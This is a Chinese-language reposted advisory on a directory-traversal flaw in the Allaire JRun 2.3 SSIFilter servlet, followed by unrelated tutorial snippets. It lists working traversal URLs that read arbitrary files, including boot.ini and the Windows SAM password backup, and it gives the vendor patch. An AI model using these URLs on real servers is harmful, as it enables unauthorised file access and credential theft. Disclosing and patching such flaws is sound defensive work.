Allaire JRUN 2.3 查看任意文件漏洞

2016-01-29 12:46 54 1 收藏

Allaire JRUN 2.3 查看任意文件漏洞,Allaire JRUN 2.3 查看任意文件漏洞

【 tulaoshi.com - Java 】

涉及程序:
JRUN

描述:
Allaire JRUN 2.3 查看任意文件漏洞

详细:
Allaire 的 JRUN 服务器 2.3上存在多重显示代码漏洞。该漏洞允许攻击者在 WEB 服务器上查看根目录下的任意文件的源代码。
JRun 2.3 使用 Java Servlets 解析各种各样类型的页面(例如:HTML, JSP等等)。基于rules.properties 和 servlets.properties 的文件设置,可能利用URL前缀"/servlet/"调用任何servlet。

它可能使用 Jrun 的 SSIFilter servlet 在目标系统上检索任意的文件。下列 2 个例子显示出能被用来检索任意的文件的 URLs :

(本文来源于图老师网站,更多请访问https://www.tulaoshi.com/java/)

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../t
est.jsp

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../.
./../../../../boot.ini

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../.
./../../../../winnt/repair/sam._
http://jrun:8000/servlet/ssifilter/../../test.jsp
http://jrun:8000/servlet/ssifilter/../../../../../../../boot.ini

(本文来源于图老师网站,更多请访问https://www.tulaoshi.com/java/)

http://jrun:8000/servlet/ssifilter/../../../../../../../winnt/repair/sam._

注意:假设JRun在主机“ jrun ”上运行,端口8000。

受影响的系统:
Allaire JRun 2.3.x

解决方案:
下载并安装补丁:
Allaire patch jr233p_ASB00_28_29
http://download.allaire.com/jrun/jr233p_ASB00_28_29.zip
Windows 95/98/NT/2000 and Windows NT Alpha

Allaire patch jr233p_ASB00_28_29tar
http://download.allaire.com/jrun/jr233p_ASB00_28_29.tar.gz
UNIX/Linux patch - GNU gzip/tar

来源:https://www.tulaoshi.com/n/20160129/1487539.html

延伸阅读
标签: 电脑入门
默认情况下Windows 8只能将特定文件类型的文件固定到开始屏幕,那么我们如果想将任意文件固定到开始屏幕,该怎么办呢? 步骤1: 打开记事本,将一下内容粘贴进去,保存为.reg类型的文件,并运行。 Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT*shellpintostartscreen] "MUIVerb"="@shell32.dll,-51201" ...
标签: 电脑入门
默认情况下Windows 8只能将特定文件类型的文件固定到开始屏幕,那么我们如果想将任意文件固定到开始屏幕,该怎么办呢? 步骤1: 打开记事本,将一下内容粘贴进去,保存为.reg类型的文件,并运行。 Windows Registry Editor Version 5.00[HKEY_CLASSES_ROOT*shellpintostartscreen]"MUIVerb"="@shell32.dll,-51201"&qu...
标签: 电脑入门
Win10系统技术预览版中,如果我们想把某个软件或者快捷方式锁定到任务栏中,方便我们打开使用,假如你是通过拖动的方式固定到任务栏,往往不能达到(如下图)。图老师小编就告诉你一个方法:Win10系统如何将软件锁定到任务栏,让你轻松解决问题。 1、在回收站或者其他任意文件夹上,这里我们创建了一个名为固定到任务栏!的文件夹。单击鼠标右...
标签: Java JAVA基础
  /** ToUnicode.java */ package com.edgewww.util; import java.io.*; /** * 字符串转换成Unicode码的类 * @author 栾金奎 jsp@shanghai.com * @date 2001-03-05 */ public class ToUnicode { /** * 把字符串转换成Unicode码 * @param strText 待转换的字符串 * @param code 转换前字符串的编码,如"GBK" * @...
标签: Web开发
打开网页后,在浏览器中输入: javascript:{clipboardData.setData("text",frames[0].document.documentElement.outerHTML);alert("请查看您的剪贴板")} 然后回车

经验教程

366

收藏

73
微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部